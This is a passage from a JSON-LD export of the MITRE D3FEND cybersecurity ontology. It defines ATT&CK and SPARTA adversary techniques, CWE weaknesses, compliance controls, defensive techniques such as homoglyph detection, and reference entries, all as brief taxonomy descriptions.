          "@id": "d3f:AsymmetricKey"
        },
        {
          "@id": "_:N42baffa5b98645c4ae5b7d856da26fb4"
        }
      ]
    },
    {
      "@id": "_:N42baffa5b98645c4ae5b7d856da26fb4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:depends-on"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PrivateKey"
      }
    },
    {
      "@id": "d3f:T1505.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1505.005",
      "d3f:definition": "Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)",
      "rdfs:label": "Terminal Services DLL",
      "rdfs:subClassOf": {
        "@id": "d3f:T1505"
      }
    },
    {
      "@id": "d3f:EX-0011",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0011",
      "d3f:definition": "The adversary times on-board actions to the period when the vehicle is in safe-mode and operating with altered guardrails. In many designs, safe-mode enables contingency command dictionaries, activates alternate receivers or antennas, reduces data rates, and prioritizes survival behaviors (sun-pointing, thermal/power conservation). Authentication checks, anti-replay windows, rate/size limits, and interlocks may differ from nominal; counters can be reset, timetag screening relaxed, or maintenance procedures made available for recovery. Ground cadence also changes, longer passes, emergency scheduling, atypical station selection, creating predictable windows for interaction. Using knowledge of these patterns, an attacker issues maintenance-looking loads, recovery scripts, parameter edits, or boot/patch sequences that the spacecraft is primed to accept while safed. Because responses (telemetry beacons, acknowledgments, mode bits) resemble normal anomaly recovery, the first execution event blends with expected behavior, allowing unauthorized reconfiguration, software modification, or state manipulation to occur under the cover of fault response.",
      "rdfs:label": "Exploit Reduced Protections During Safe-Mode - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0011/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Exploit Reduced Protections During Safe-Mode"
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-003%3ADLLInjectionWithMavinject_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-003/"
      },
      "d3f:kb-abstract": "Injecting a malicious DLL into a process is a common adversary TTP. Although the ways of doing this are numerous, mavinject.exe is a commonly used tool for doing so because it roles up many of the necessary steps into one, and is available within Windows. Attackers may rename the executable, so we also use the common argument “INJECTRUNNING” as a related signature here. Whitelisting certain applications may be necessary to reduce noise for this analytic.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-003: DLL Injection with Mavinject",
      "rdfs:label": "Reference - CAR-2020-11-003: DLL Injection with Mavinject - MITRE"
    },
    {
      "@id": "d3f:UseCaseProcedure",
      "@type": "owl:Class",
      "rdfs:label": "Use Case Procedure",
      "rdfs:subClassOf": {
        "@id": "d3f:Procedure"
      }
    },
    {
      "@id": "d3f:CWE-234",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-234",
      "d3f:definition": "If too few arguments are sent to a function, the function will still pop the expected number of arguments from the stack. Potentially, a variable number of arguments could be exhausted in a function as well.",
      "rdfs:label": "Failure to Handle Missing Parameter",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-233"
      }
    },
    {
      "@id": "d3f:CCI-000144_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides a real-time alert when organization-defined audit failure events occur.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemDaemonMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-20T00:00:00"
      },
      "rdfs:label": "CCI-000144"
    },
    {
      "@id": "d3f:FileEncryptionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the application of cryptographic techniques to a file, ensuring its content is securely encoded and inaccessible without proper decryption keys.",
      "rdfs:label": "File Encryption Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:Nbed75272b53d4f5985c3d13e099f6ef3"
        }
      ]
    },
    {
      "@id": "_:Nbed75272b53d4f5985c3d13e099f6ef3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileCreationEvent"
      }
    },
    {
      "@id": "d3f:T0872",
      "@type": "owl:Class",
      "d3f:attack-id": "T0872",
      "d3f:definition": "Adversaries may attempt to remove indicators of their presence on a system in an effort to cover their tracks. In cases where an adversary may feel detection is imminent, they may try to overwrite, delete, or cover up changes they have made to the device.",
      "rdfs:label": "Indicator Removal on Host - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSEvasionTechnique"
      },
      "skos:prefLabel": "Indicator Removal on Host"
    },
    {
      "@id": "d3f:NetworkConnectionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event related to the establishment, maintenance, or termination of a network connection.",
      "rdfs:label": "Network Connection Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/network_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkEvent"
        },
        {
          "@id": "_:Nb10a0050ea68458ab3b8979b8a18b12d"
        }
      ]
    },
    {
      "@id": "_:Nb10a0050ea68458ab3b8979b8a18b12d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkSession"
      }
    },
    {
      "@id": "d3f:POSIXSymbolicLink",
      "@type": "owl:Class",
      "d3f:definition": "A POSIX-compliant symbolic link.  These are often fast symbolic links, but need not be.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Symbolic_link"
      },
      "rdfs:label": "POSIX Symbolic Link",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SymbolicLink"
        },
        {
          "@id": "d3f:UnixLink"
        }
      ]
    },
    {
      "@id": "d3f:CWE-526",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-526",
      "d3f:definition": "The product uses an environment variable to store unencrypted sensitive information.",
      "rdfs:label": "Cleartext Storage of Sensitive Information in an Environment Variable",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-312"
      }
    },
    {
      "@id": "d3f:Endpoint-basedWebServerAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Endpoint-basedWebServerAccessMediation"
      ],
      "d3f:d3fend-id": "D3-EBWSAM",
      "d3f:definition": "Endpoint-based web server access mediation regulates web server access directly from user endpoints by implementing mechanisms such as client-side certificates and endpoint security software to authenticate devices and ensure compliant access.",
      "d3f:kb-article": "## How it works\n\nEndpoint-based Web Server Access Mediation focuses on managing access to web servers directly from user devices. This involves implementing security measures like client certificates or endpoint security software to ensure that only authorized devices can initiate sessions with web servers. Examples include direct access to internal web applications from company laptops.\n",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NIST-Special-Publication-800-41-Revision-1"
      },
      "rdfs:label": "Endpoint-based Web Server Access Mediation",
      "rdfs:subClassOf": {
        "@id": "d3f:WebSessionAccessMediation"
      }
    },
    {
      "@id": "d3f:TA0011",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to communicate with compromised systems to control them.\n\nCommand and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim's network structure and defenses.",
      "d3f:display-order": 10,
      "rdfs:label": "Command And Control",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:NTPServerResponseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an NTP server sends time synchronization data to a client, enabling the client to align its local clock with the server's reference time.",
      "rdfs:label": "NTP Server Response Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NTPEvent"
        },
        {
          "@id": "_:Na4a5745e9a6048d2a658d776056ad56e"
        }
      ]
    },
    {
      "@id": "_:Na4a5745e9a6048d2a658d776056ad56e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NTPClientSyncEvent"
      }
    },
    {
      "@id": "d3f:LDIFRecord",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserAccount"
      ],
      "rdfs:label": "LDIF Record"
    },
    {
      "@id": "d3f:Reference-TypeSystems_Princeton",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.cs.princeton.edu/courses/archive/fall98/cs441/mainus/node4.html"
      },
      "d3f:kb-organization": "Princeton University",
      "d3f:kb-reference-of": {
        "@id": "d3f:VariableTypeValidation"
      },
      "d3f:kb-reference-title": "Why type checking?",
      "rdfs:label": "Reference - Type Systems"
    },
    {
      "@id": "d3f:HardwareTimer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A hardware timer is defined as an electronic component that serves as an 8-bit or 16-bit counter, capable of measuring time intervals, generating timed outputs, and driving loads through mechanisms such as pulse width modulation (PWM).",
      "rdfs:isDefinedBy": {
        "@id": "https://www.sciencedirect.com/topics/engineering/hardware-timer"
      },
      "rdfs:label": "Hardware Timer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "d3f:Timer"
        }
      ]
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForProvidingSoftwareUpdatesToLocalMachines",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10474448B2/en"
      },
      "d3f:kb-author": "John Melton Reynolds",
      "d3f:kb-organization": "Sophos Ltd",
      "d3f:kb-reference-title": "Method and system for providing software updates to local machines",
      "rdfs:label": "Reference - Method and system for providing software updates to local machines"
    },
    {
      "@id": "d3f:WindowsRegistryKeyEvent",
      "@type": "owl:Class",
      "d3f:definition": "Events representing actions performed on Windows Registry keys, such as creation, modification, or deletion, which define hierarchical nodes for storing configuration data.",
      "rdfs:label": "Windows Registry Key Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/win/registry_key_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryEvent"
        },
        {
          "@id": "_:N3e6aac54a9d0415ba5bee6439f70e07b"
        }
      ]
    },
    {
      "@id": "_:N3e6aac54a9d0415ba5bee6439f70e07b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKey"
      }
    },
    {
      "@id": "d3f:process-image-path",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x process-image-path y: The filepath y is the process image path for the process x, indicating the path to the resource from which the process's image was loaded.",
      "rdfs:label": "process-image-path",
      "rdfs:subPropertyOf": {
        "@id": "d3f:process-property"
      },
      "skos:altLabel": "processImagePath"
    },
    {
      "@id": "d3f:PhysicalLinkDisconnectEvent",
      "@type": "owl:Class",
      "d3f:definition": "The transmission medium is removed or power is cut, physically breaking the path between the two interfaces.",
      "rdfs:label": "Physical Link Disconnect Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalLinkEvent"
        },
        {
          "@id": "_:Na064735ef68849a9af42225f25d423b7"
        }
      ]
    },
    {
      "@id": "_:Na064735ef68849a9af42225f25d423b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLinkDownEvent"
      }
    },
    {
      "@id": "d3f:TA0005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to avoid being detected.\n\nDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics' techniques are cross-listed here when those techniques include the added benefit of subverting defenses.",
      "d3f:display-order": 5,
      "rdfs:label": "Defense Evasion",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:CWE-203",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-203",
      "d3f:definition": "The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not.",
      "d3f:synonym": "Side Channel Attack",
      "rdfs:label": "Observable Discrepancy",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:FilePathOpenFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:File"
      },
      "d3f:definition": "Has an input of a file path, and opens a file handle for reading or writing.",
      "d3f:invokes": {
        "@id": "d3f:OpenFile"
      },
      "rdfs:label": "File Path Open Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:N9c90b60473a14355809eff58655b00f7"
        },
        {
          "@id": "_:N76318be924a542eab59c2529bbc4bd67"
        }
      ]
    },
    {
      "@id": "_:N9c90b60473a14355809eff58655b00f7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N76318be924a542eab59c2529bbc4bd67",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OpenFile"
      }
    },
    {
      "@id": "d3f:Reference-FirewallsThatFilterBasedUponProtocolCommands_IntelCorp",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US6832256B1"
      },
      "d3f:kb-abstract": "Data transfer is controlled between a first network and a second network of computers by a firewall-proxy combination. Active interpretation of protocol commands exchanged between the first network and the second network is performed to determine specific actions concerning completion of the protocol request. This active firewall-proxy combination may exist on either the first or second network of computers. This method of control provides centralized control and administration for all potentially reachable resources within a network.",
      "d3f:kb-author": "James E. Toga",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Intel Corp",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundTrafficFiltering"
      },
      "d3f:kb-reference-title": "Firewalls that filter based upon protocol commands",
      "rdfs:label": "Reference - Firewalls that filter based upon protocol commands - Intel Corp"
    },
    {
      "@id": "d3f:Semi-supervisedManifoldLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSML",
      "d3f:definition": "A version of Semi-Supervised Learning that applies the Manifold assumption that the data like approximately on a manifold of much lower dimension than the input space.",
      "d3f:kb-article": "## References\nWeak supervision. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Weak_supervision#Generative_models).",
      "rdfs:label": "Semi-supervised Manifold Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:IntrinsicallySemi-supervisedLearning"
      }
    },
    {
      "@id": "d3f:CWE-1075",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1075",
      "d3f:definition": "The product performs unconditional control transfer (such as a \"goto\") in code outside of a branching structure such as a switch block.",
      "rdfs:label": "Unconditional Control Flow Transfer outside of Switch Block",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:T1437.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1437.001",
      "d3f:definition": "Adversaries may communicate using application layer protocols associated with web protocols traffic to avoid detection/network filtering by blending in with existing traffic. Commands to remote mobile devices, and often the results of those commands, will be embedded within the protocol traffic between the mobile client and server.",
      "rdfs:label": "Web Protocols - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1437"
      },
      "skos:prefLabel": "Web Protocols"
    },
    {
      "@id": "d3f:CCI-000056_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system retains the session lock until the user reestablishes access using established identification and authentication procedures.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000056"
    },
    {
      "@id": "d3f:T1059.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.004",
      "d3f:definition": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.",
      "rdfs:label": "Unix Shell",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      },
      "skos:altLabel": "Bash Execution"
    },
    {
      "@id": "d3f:WindowsNTGetThreadContext",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtGetThreadContext",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIGetThreadContext"
      }
    },
    {
      "@id": "d3f:REC-0006",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0006",
      "d3f:definition": "Adversaries collect a cradle-to-operations view of how flight software is built, tested, signed, and released. Useful artifacts include architecture docs, source trees and SBOMs, compiler/linker toolchains and flags, RTOS and middleware versions, build scripts, CI/CD pipelines, code-signing workflows, defect trackers, and release notes that describe “as-built” vs. “as-flown” deltas. They also seek integration environments, emulators/SIL, flatsats/iron birds, hardware-in-the-loop rigs, and the autonomy/FDIR logic that governs mode transitions and patch acceptance. With this knowledge, a threat actor can identify weak crypto or provenance controls on update paths, predict error-handling behavior, and craft inputs that slip past unit/integration tests. Even small disclosures (e.g., a linker script, an assert string, or a sanitized crash dump) shrink the search space for exploitation.",
      "rdfs:label": "Gather FSW Development Information - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0006/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAReconnaissanceTechnique"
      },
      "skos:prefLabel": "Gather FSW Development Information"
    },
    {
      "@id": "d3f:CWE-142",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-142",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as value delimiters when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Value Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-140"
      }
    },
    {
      "@id": "d3f:T1660",
      "@type": "owl:Class",
      "d3f:attack-id": "T1660",
      "d3f:definition": "Adversaries may send malicious content to users in order to gain access to their mobile devices. All forms of phishing are electronically delivered social engineering. Adversaries can conduct both non-targeted phishing, such as in mass malware spam campaigns, as well as more targeted phishing tailored for a specific individual, company, or industry, known as “spearphishing”.  Phishing often involves social engineering techniques, such as posing as a trusted source, as well as evasion techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages.",
      "rdfs:label": "Phishing - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileInitialAccessTechnique"
      },
      "skos:prefLabel": "Phishing"
    },
    {
      "@id": "d3f:HomoglyphDetection",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:HomoglyphDetection"
      ],
      "d3f:analyzes": [
        {
          "@id": "d3f:Email"
        },
        {
          "@id": "d3f:URL"
        }
      ],
      "d3f:d3fend-id": "D3-HD",
      "d3f:definition": "Comparing strings using a variety of techniques to determine if a deceptive or malicious string is being presented to a user.",
      "d3f:kb-article": "## How it works\nA homoglyph, in this context, is a deceptive string or word which looks like a trusted word, but is composed of different characters, for example: goooogle.com versus google.com. This is commonly found in phishing and typo squatting attacks where a human exploiting through a social engineering campaign.\n\n## Considerations\n* In very large environments processing DNS queries can be computationally expensive due to the amount of traffic that is generated\n* Legitimate companies and products use non-dictionary words in their names that could result in many false positives",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-Computer-implementedMethodsAndSystemsForIdentifyingVisuallySimilarTextCharacterStrings_GreathornInc"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodForDetectingHomoglyphAttacksWithASiameseConvolutionalNeuralNetwork_EndgameInc"
        }
      ],
      "rdfs:label": "Homoglyph Detection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IdentifierAnalysis"
        },
        {
          "@id": "_:N916f2bd0bebe4b60b0ca3dd9001d9bd5"
        },
        {
          "@id": "_:Nd9acb6aa55c34bc0961fa12f57f81251"
        }
      ]
    },
    {
      "@id": "_:N916f2bd0bebe4b60b0ca3dd9001d9bd5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "_:Nd9acb6aa55c34bc0961fa12f57f81251",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:DigitalMedia",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Digital media refers to any communication media that operate in conjunction with various encoded machine-readable data formats.",
      "rdfs:isDefinedBy": "https://dbpedia.org/page/Digital_media",
      "rdfs:label": "Digital Media",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformation"
      }
    },
    {
      "@id": "d3f:PasswordManager",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Credential"
      },
      "d3f:definition": "A password manager is a software application or hardware that helps a user store and organize passwords. Password managers usually store passwords encrypted, requiring the user to create a master password: a single, ideally very strong password which grants the user access to their entire password database. Some password managers store passwords on the user's computer (called offline password managers), whereas others store data in the provider's cloud (often called online password managers). However offline password managers also offer data storage in the user's own cloud accounts rather than the provider's cloud. While the core functionality of a password manager is to securely store large collections of passwords, many provide additional features such as form filling and password generation.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Password_manager"
      },
      "rdfs:label": "Password Manager",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Application"
        },
        {
          "@id": "_:N22dea2849e73404ab8e259d7592a221f"
        }
      ]
    },
    {
      "@id": "_:N22dea2849e73404ab8e259d7592a221f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:T1056",
      "@type": "owl:Class",
      "d3f:attack-id": "T1056",
      "d3f:definition": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).",
      "rdfs:label": "Input Capture",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "d3f:CredentialAccessTechnique"
        }
      ]
    },
    {
      "@id": "d3f:ConfigurationInventory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ConfigurationInventory"
      ],
      "d3f:d3fend-id": "D3-CI",
      "d3f:definition": "Configuration inventory identifies and records the configuration of software and hardware and their components throughout the organization.",
      "d3f:inventories": {
        "@id": "d3f:ConfigurationResource"
      },
      "d3f:kb-article": "## How it works\n\nThe organization retrieves configuration information through means of SNMP (MIB records), WBEM (CIM records), other protocols, or custom scripts and captures that information in a repository, typically known as a Configuration Management Database (CMDB).\"",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-Web-BasedEnterpriseManagement"
        },
        {
          "@id": "d3f:Reference-Windows-Management-Infrastructure"
        },
        {
          "@id": "d3f:Reference-Windows-Management-Instrumentation"
        }
      ],
      "rdfs:label": "Configuration Inventory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AssetInventory"
        },
        {
          "@id": "_:N7c073d073486469686aea0922e4369d5"
        }
      ]
    },
    {
      "@id": "_:N7c073d073486469686aea0922e4369d5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:inventories"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ConfigurationResource"
      }
    },
    {
      "@id": "d3f:UserGroupPermissions",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:UserGroupPermissions"
      ],
      "d3f:d3fend-id": "D3F-UGPH",
      "d3f:definition": "Access control where access is determined based on attributes associated with users and the objects being accessed.",
      "d3f:kb-article": "## How it works\n\nAccess is determined based on the attributes associated with subjects (requesters) and the objects being accessed. Each object and subject has a set of associated attributes, such as location, time of creation, and access rights. Access to an object is authorized or denied depending on whether the required. ",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-GuidetoOTSecurity"
      },
      "d3f:restricts": {
        "@id": "d3f:UserGroup"
      },
      "d3f:synonym": "Role Based Access Controls",
      "rdfs:isDefinedBy": {
        "@id": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r3.pdf"
      },
      "rdfs:label": "User Group Permissions",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessPolicyAdministration"
        },
        {
          "@id": "_:N07ef1363b20644c2bc8da550e7742839"
        }
      ]
    },
    {
      "@id": "_:N07ef1363b20644c2bc8da550e7742839",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserGroup"
      }
    },
    {
      "@id": "d3f:T1598.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1598.001",
      "d3f:definition": "Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.",
      "rdfs:label": "Spearphishing Service",
      "rdfs:subClassOf": {
        "@id": "d3f:T1598"
      }
    },
    {
      "@id": "d3f:PeripheralFirmware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Firmware that is installed on computer peripheral devices.",
      "rdfs:label": "Peripheral Firmware",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:Firmware"
        },
        {
          "@id": "dbr:Peripheral"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Firmware"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Dynamic Information Flow Control",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(3)"
    },
    {
      "@id": "d3f:Reference-CiscoASR9000AccessListCommands",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.cisco.com/c/en/us/td/docs/routers/asr9000/software/asr9k_r4-0/addr_serv/command/reference/ir40asrbook_chapter1.html"
      },
      "d3f:kb-abstract": "An access control list (ACL) consists of one or more access control entries (ACEs) that collectively define the network traffic profile. This profile can then be referenced by Cisco IOS XR Software software features such as traffic filtering, priority or custom queueing, and dynamic access control. Each ACL includes an action element (permit or deny) and a filter element based on criteria such as source address, destination address, protocol, and protocol-specific parameters.",
      "d3f:kb-organization": "Cisco",
      "d3f:kb-reference-of": {
        "@id": "d3f:NetworkTrafficPolicyMapping"
      },
      "d3f:kb-reference-title": "Cisco ASR 9000 Series Aggregation Services Routers - Access List Commands",
      "rdfs:label": "Reference - Cisco ASR 9000 Series Aggregation Services Routers - Access List Commands"
    },
    {
      "@id": "d3f:M1036",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "D3-AZET may be related (is potentially related though not called out in ATT&CK definition.)",
      "d3f:related": [
        {
          "@id": "d3f:AccountLocking"
        },
        {
          "@id": "d3f:AuthenticationCacheInvalidation"
        },
        {
          "@id": "d3f:AuthenticationEventThresholding"
        }
      ],
